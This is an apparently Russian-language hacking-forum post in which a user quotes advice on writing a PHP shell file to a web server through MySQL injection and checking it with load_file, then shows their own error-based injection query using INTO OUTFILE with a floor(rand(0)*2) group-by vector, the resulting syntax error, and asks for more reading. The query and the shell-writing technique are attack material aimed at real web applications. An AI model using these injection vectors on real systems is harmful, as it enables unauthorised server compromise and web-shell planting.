11.05.2015, 20:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
5548
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
↑
Для Error-Based есть такой вектор:
Для Union Based заливаете как есть, несмотря на отсутствие вывода. Проверяете залился ли файл командами
select if(load_file('/tmp/shell.php') is not null,1,2)=1 TRUE Файл существут
select if(load_file('/tmp/shell.php') is not null,1,2)=1 FALSE Файла нет Создал на Денвере таблицу users где есть id и username
Пишет ошибку:
Сообщение от None
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile '/usr/home/www/test.php' lines terminated by ""),floo' at line 1
Сам запрос:
Сообщение от None
select username from users where id>0 or (select count(*) from (select 1 union select 2 union select 3)x group by concat((select 1 into outfile '/usr/home/www/test.php' lines terminated by ''),floor(rand(0)*2)))
Где почитать можно подробнее?
Mysql символ " не совсем хорошо понимает!
|
|
|
|